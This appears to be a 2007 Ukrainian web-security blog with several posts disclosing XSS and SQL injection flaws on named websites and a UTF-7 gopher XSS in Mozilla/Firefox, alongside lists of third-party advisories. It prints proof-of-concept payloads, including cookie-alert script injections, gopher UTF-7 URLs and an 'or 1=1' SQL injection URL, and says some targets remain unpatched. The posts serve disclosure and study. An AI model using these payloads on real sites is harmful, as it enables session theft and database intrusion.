Websecurity - Веб безпека

11.05.2007

У січні, 04.01.2007, я знайшов декілька Cross-Site Scripting уразливостей на проекті http://saitodel.com. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

06.10.2007

XSS:

POST запит на сторінці http://saitodel.com/contact/:

"><script>alert(document.cookie)</script>В полях: Ваше имя, Ваш е-mail, Ваш тел., Ваш веб-сайт.

</textarea><script>alert(document.cookie)</script>В полі: Ваше сообщение.

Дані уразливості (що наявні в плагіні WP-ContactForm) досі не виправлені.

В даній добірці уразливості в веб додатках:

• Wserve HTTP Server 4.6 Version (Long Directory Name) Buffer Overflow - Denial Of Service (деталі)
• Directory traversal vulnerability in zenphoto 1.0.4 up to 1.0.6 (деталі)
• Variable overwrite vulnerability in OpenEMR (деталі)
• phpEventMan v1.0.2 (level) Remote File Include Exploit (деталі)
• SIPS <= 0.3.1(box.inc.php) Remote File Include Vulnerability (деталі)
• Cerulean Portal System (phpbb_root_path) Remote File Include Exploit (деталі)
• Omegaboard v1.0b4 (phpbb_root_path) Remote File Include Exploit (деталі)
• NuRems 1.0 (propertysdetails.asp) Remote SQL Injection Exploit (деталі)
• BrewBlogger 1.3.1 SQL Injection Exploit (деталі)
• PHP-інклюдинг в LoCal Calendar System (деталі)
• PHP-інклюдинг в Comdev Form Designer (деталі)
• PHP remote file inclusion vulnerability in EncapsCMS 0.3.6 (деталі)
• Обхід обмежень безпеки в WIMS (деталі)
• PHP-інклюдинг в Comdev Web Blogger (деталі)
• Multiple SQL injection vulnerabilities in OmniStar Article Manager (деталі)

08.05.2007

У січні, 03.01.2007, я знайшов Cross-Site Scripting уразливість на популярному проекті http://muzon.com. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

04.10.2007

XSS:

• alert(document.cookie)
• цікавий
• html включення (PR4)

Дана уразливість досі не виправлена.

Після попередньої уразливості в Internet Explorer, що я виявив у серпні, пропоную нову уразливість в Mozilla та Firefox.

В минулому місяці, 23.09.2007, я виявив цікаву Cross-Site Scripting уразливість в Mozilla та Firefox (це XSS та URI Exploitation уразливість). Дану XSS я відношу до типу Strictly social XSS.

Вона пов’язана з тим, що браузер недостатньо фільтрує символи при UTF-7 кодуванні в протоколі gopher. Дане кодування слід виставити вручну (що зменшує рівень небезпеки). Тому для атаки потрібно змусити жертву встановити UTF-7 кодування (використовуючи методи соціальної інженерії, як це показано в прикладі з додатковим текстом).

Тестування проводилося в наступних браузерах: Mozilla 1.7.7, Firefox 0.8 та Firefox 2.0.

XSS:

• alert(’XSS’)
• alert(’XSS’) (з додатковим текстом)

gopher:///1+ADw-SCRIPT+AD4-alert('XSS')+ADw-/SCRIPT+AD4-

В Firefox 2.0 фільтруються символи " та ‘, тому потрібно використати інші підходи (наприклад, замінити їх в alert на “/”).

XSS (Firefox 2.0):

• alert(/XSS/)
• alert(/XSS/) (з додатковим текстом)

gopher:///1+ADw-SCRIPT+AD4-alert(/XSS/)+ADw-/SCRIPT+AD4-

Уразливість може існувати в усіх браузерах, де підтримується gopher протокол: Mozilla, Mozilla Firefox, SeaMonkey (та в браузерах на движку Mozilla) різних версій. Браузери Internet Explorer 6 (версій після патча 2002 року, котрий прибрав підтримку gopher) та 7 не уразливі, тому що не підтримують gopher протокол.

В даній добірці уразливості в веб додатках:

• phpechocms v.2 Cross-Site Scripting Vulnerability (деталі)
• K-CMS v1.0 Remote File Include Vulnerabilities (деталі)
• iXon_CMS 0.30 Remote File Include Vulnerabilities (деталі)
• Remot File Include In phpexplorator_2_0 (деталі)
• eXV2 CMS - Session fixation and Cross-Site-Scripting Issues (деталі)
• lite-cms-0.2.1 Remote File Include Vulnerabilities (деталі)
• Remote File Include In Script stat12 (деталі)
• PHP-інклюдинг в ArticleBeach Script (деталі)
• Обход ограничений безопасности в MiniHTTP Web Forum (деталі)
• Multiple cross-site scripting (XSS) vulnerabilities in A+ Store E-Commerce (деталі)
• New bugzilla packages fix several vulnerabilities (деталі)
• Multiple SQL injection vulnerabilities in Hpecs Shopping Cart (деталі)
• SQL-ін’єкція в Discuz! GBK (деталі)
• New trac packages fix cross-site request forgery (деталі)
• PHP-інклюдинг в Comdev Forum (деталі)

26.05.2007

У січні, 02.01.2007, я знайшов декілька уразливостей на проекті http://chumaki.meta.ua (Full path disclosure, Information leak та потенційна SQL-Injection). Про що найближчим часом сповіщу адміністрацію проекту.

Останнього разу стосовно проектів компанії Мета я писав про уразливість на metamarket.com.ua.

Детальна інформація про уразливості з’явиться пізніше.

02.10.2007

Full path disclosure та Information leak:

http://chumaki.meta.ua/titul.php?f=getnews&p1=a

SQL Injection:

http://chumaki.meta.ua/titul.php?f=getnews&p1=879%20or%201=1

Дані уразливості вже виправлені.

На минулому тижні була знайдена нова XSS уразливість на сайті Гугла. Як повідомив Beford в своєму записі Google Vulnerability, він виявив уразливість в Google Polls.

Він привів приклад (PoC) даної уразливості. А також привів два приклади її експлуатації: в першому прикладі демонструється контакти користувача (з його акаунта), а в другому Gmail акаунт користувача налаштовується таким чином, що пересилає всі нові отримані листи на інший емайл (тобто робить mail forwarding). Це серйозна уразливість в Гуглі та доволі цікаві приклади.

Дірку Google вже виправив, але цей випадок продемонстрував рівень безпеки сервісів Гугла (який їм потрібно покращувати).

В даній добірці уразливості в веб додатках:

• PHP-FUSION topliste Module (cid) Remote SQL Injection Vuln (деталі)
• phpMyNewsletter 0.6.10 (customize.php l) RFI Vulnerability: (деталі)
• AROUNDMe 0.7.7 Multiple Remote File Inclusion Vulnerabilities (деталі)
• MyBlog: PHP and MySQL Blog/CMS software Remote File Include Vulnerabilitiy (деталі)
• MyBlog: PHP and MySQL Blog/CMS software Cross-Site Scripting Vulnerabilitiy (деталі)
• phpechocms2 Remote File Include Vulnerabilities (деталі)
• Monkey CMS v0.0.3 Remote File Include Vulnerabilitiy (деталі)
• WarFTPd 1.82.00-RC11 Remote Denial of Service Exploit (деталі)
• PHP-інклюдинг в MDweb (деталі)
• AspPired2Poll <= 1.0 (MoreInfo.asp) Remote SQL Injection Exploit (деталі)
• Декілька уразливостей в PacPoll (деталі)
• SQL-ін’єкція в LedgerSMB (деталі)
• CRLF injection vulnerability in fvwm (деталі)
• Multiple cross-site scripting (XSS) vulnerabilities in INFINICART (деталі)
• SQL injection vulnerability in A+ Store E-Commerce (деталі)

У квітні, 21.04.2007, я знайшов Cross-Site Scripting уразливість на проекті http://fundux.ru. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливість з’явиться пізніше.

07.05.2007

У грудні, 29.12.2006, я знайшов Cross-Site Scripting уразливість на популярному проекті http://search.a.ua (пошукова система порталу A.UA). Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливість з’явиться пізніше.

30.09.2007

XSS:

• alert(document.cookie)
• цікавий
• html включення (PR5)

Дана уразливість досі не виправлена.